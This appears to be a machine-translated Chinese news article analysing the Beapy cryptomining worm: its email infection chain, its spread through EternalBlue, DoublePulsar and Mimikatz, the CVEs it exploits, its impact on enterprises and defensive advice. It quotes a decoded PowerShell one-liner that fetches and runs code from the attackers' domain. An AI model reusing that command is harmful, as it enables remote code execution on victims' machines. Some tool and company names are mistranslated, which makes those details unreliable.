還記得著名的黑客組織影子經(jīng)紀(jì)人嗎，他們什么也沒做，只是做了一些驚人的事情？由于影子經(jīng)紀(jì)人在2016年竊取并宣傳了美國國家安全局(NSA)用于滲透全球設(shè)備和網(wǎng)絡(luò)的一系列惡意程序，這些惡意程序必須定期出來刷存在感。

一個(gè)

背景

賽門鐵克發(fā)現(xiàn)了一種新的加密挖掘惡意軟件，主要針對企業(yè)。這種被稱為Beapy的惡意軟件，利用NSA黑客工具ExeCutive Blue(ExeCutive Blue)和竊取的硬編碼憑據(jù)在網(wǎng)絡(luò)中快速傳播，從而從受感染的計(jì)算機(jī)中收集憑據(jù)，迫使計(jì)算機(jī)運(yùn)行挖掘代碼來挖掘加密的數(shù)字現(xiàn)金——包括修復(fù)的計(jì)算機(jī)，主要影響中國企業(yè)。

Beapy活動最早發(fā)現(xiàn)于2019年1月，從3月初開始越來越活躍，也出現(xiàn)在網(wǎng)絡(luò)服務(wù)器上。

Beapy(W32。Beapy)是一個(gè)基于文件的coinminer，它使用電子郵件作為初始感染媒介。此次活動表明，雖然加密貨幣挖掘活動自2018年初以來有所下降，但仍是部分網(wǎng)絡(luò)犯罪分子關(guān)注的焦點(diǎn)，企業(yè)現(xiàn)已成為主要攻擊目標(biāo)。

Beapy的受害者幾乎都是企業(yè)。雖然研究人員沒有證據(jù)表明這些攻擊是有針對性的，但Beapy的蠕蟲功能表明它可能在整個(gè)企業(yè)網(wǎng)絡(luò)中傳播。

Beapy對亞洲企業(yè)影響最大，80%以上的受害者位于中國，其他受害者位于韓國、日本、菲律賓、越南、孟加拉國，部分美國企業(yè)(美國、牙買加)也受到影響。

2

感染鏈

Beapy使用惡意電子郵件作為初始載體，其中包含惡意Excel文檔的附件。如果電子郵件收件人打開惡意附件，目標(biāo)計(jì)算機(jī)將下載后門。NSA開發(fā)的雙脈沖星。安裝后門后，可以在受感染的計(jì)算機(jī)上遠(yuǎn)程執(zhí)行代碼。永恒藍(lán)利用視窗中小企業(yè)協(xié)議中的漏洞，允許文件在網(wǎng)絡(luò)上水平傳播。

安裝DoublePulsar后執(zhí)行PowerShell命令，并在將coinminer下載到目標(biāo)計(jì)算機(jī)之前聯(lián)系Beapy命令和控制(c&c)服務(wù)器。

根據(jù)研究人員捕獲的樣本，活動早在2019年2月15日就開始了，當(dāng)時(shí)第一次探測到了雙脈沖星的后門。然后，研究人員發(fā)現(xiàn)了正在執(zhí)行的PowerShell命令，其解碼如下:iex (new-objectnet.webclient)。downloadstring(' http://v . beahh . com/v "+$ env:user domain)。執(zhí)行了一些PowerShell命令后，會下載挖掘模塊，以“無文件”的方式挖掘門羅幣。

Beapy先攻擊未打補(bǔ)丁的電腦，然后用永恒藍(lán)(ForeverBlue)感染其他機(jī)器。但Beapy不僅使用NSA黑客工具進(jìn)行傳播，還使用Hacktool。Mimikatz是一種竊取憑據(jù)的工具，它試圖從受感染的計(jì)算機(jī)上收集憑據(jù)，并使用硬編碼的用戶名和密碼列表來試圖在網(wǎng)絡(luò)上傳播。

三

網(wǎng)絡(luò)服務(wù)器

賽門鐵克遙測公司還在一個(gè)開放的網(wǎng)絡(luò)服務(wù)器上發(fā)現(xiàn)了老版本的Beapy。該蠕蟲試圖通過生成IP地址列表來感染連接到服務(wù)器的計(jì)算機(jī)。

Web服務(wù)器上找到的Beapy版本比較老，是用c語言寫的，而新版本的Beapy是用Python寫的。但是，功能是相似的。下載的惡意軟件還包括Mimikatz模塊的憑據(jù)收集和永恒藍(lán)色利用功能。

在被感染的Web服務(wù)器中，Beapy還試圖利用Apache Struts漏洞(CVE-2017-5638)，該漏洞已于2017年修復(fù)，但一旦成功利用該漏洞，就可以執(zhí)行遠(yuǎn)程代碼。Beapy還試圖利用Apache Tomcat(CVE-2017-12615)和Oracle WebLogic服務(wù)器(CVE-2017-10271)中的已知漏洞。

總的來說，從3月初開始，Beapy活動一直在增加。

四

永恒藍(lán)色和雙脈沖星

永恒藍(lán)和雙脈沖星是影子經(jīng)紀(jì)人發(fā)布的NSA黑客工具，在2017年毀滅性的WannaCry ransomware攻擊中使用。

永恒藍(lán)專門遠(yuǎn)程攻擊Windows文件共享端口(端口445)，讓犯罪分子無需任何用戶操作，就能在計(jì)算機(jī)和服務(wù)器上植入ransomware、遠(yuǎn)程控制木馬、虛擬貨幣采掘機(jī)等惡意程序。

在此活動中，攻擊者更新了永恒藍(lán)色下載器特洛伊木馬，并在更新后啟用了新的C2域名。永恒藍(lán)下載器木馬不斷更新，最新更新時(shí)間表如下:

在NSA的一系列SMB利用背后，最終會使用DoublePulsar后門。DoublePulsar后門是一個(gè)無文件內(nèi)核級的SMB后門。一旦在后門植入安全系統(tǒng)，就可以長時(shí)間遠(yuǎn)程控制，系統(tǒng)就不再安全。

受DoublePulsar的啟發(fā)，美國網(wǎng)絡(luò)安全公司RiskSence的研究員肖恩·狄龍(Sean Dillon)創(chuàng)建了一個(gè)名為“SMBdoor”的惡意軟件后門，突出了防病毒產(chǎn)品沒有注意到的操作系統(tǒng)部分。一旦安裝了SMBdoor后門，它將濫用srvnet.sys進(jìn)程中未記錄的API，并將自己注冊為服務(wù)器消息塊(SMB)連接的有效處理程序。這個(gè)后門非常隱蔽，因?yàn)樗鼪]有綁定任何本地套接字、開放端口或鉤子到現(xiàn)有的功能，從而避免觸發(fā)一些防病毒系統(tǒng)警報(bào)。

但是SMBdoor代碼主要用于學(xué)術(shù)研究，網(wǎng)絡(luò)罪犯不能像部署DoublePulsar一樣從GitHub下載并感染用戶。

五

對企業(yè)的影響

雖然加密貨幣挖掘惡意軟件的破壞性不如ransomware，但它可能仍然會對公司的運(yùn)營產(chǎn)生重大影響。對企業(yè)的潛在影響包括:

設(shè)備性能下降，導(dǎo)致生產(chǎn)力下降；設(shè)備不穩(wěn)定或無法使用，導(dǎo)致IT成本增加；企業(yè)成本增加，原因有二：用電量增加；有些企業(yè)使用的云服務(wù)按CPU使用率收費(fèi)。

因此，企業(yè)需要確保其網(wǎng)絡(luò)免受各種網(wǎng)絡(luò)安全威脅。

六

建議

1.檢查不正確的Powershell進(jìn)程、異常的網(wǎng)絡(luò)訪問和異常的CPU占用率，使用殺毒軟件及時(shí)對系統(tǒng)進(jìn)行全面掃描。

2.安裝永恒藍(lán)漏洞補(bǔ)丁，手動下載，請?jiān)L問以下頁面:https://TechNet . Microsoft . com/zh-cn/library/security/ms17-010 . aspx，其中WinXP和Windows Server 2003的用戶應(yīng)訪問:

https://www.catalog.update.microsoft.com/Search.aspx? q = KB 4012598 .

3.嘗試關(guān)閉不必要的端口，如445、135、139等。端口3389、5900等?？梢员涣腥氚酌麊?，并且只允許白名單中的IP連接登錄。

4.對沒有互聯(lián)要求的服務(wù)器/工作站的內(nèi)部訪問設(shè)置相應(yīng)的控制，防止可以連接到外部網(wǎng)絡(luò)的服務(wù)器被攻擊成為進(jìn)一步攻擊其他服務(wù)器的跳板。

5.定期對重要文件和數(shù)據(jù)(如數(shù)據(jù)庫)進(jìn)行非本地備份。

6.服務(wù)器使用高強(qiáng)度密碼，不使用弱密碼，防止黑客暴力破解。

7.在終端/服務(wù)器上部署專業(yè)的殺毒軟件，防止病毒木馬入侵。Web服務(wù)器可以部署在騰訊云等具有專業(yè)安全防護(hù)能力的云服務(wù)中。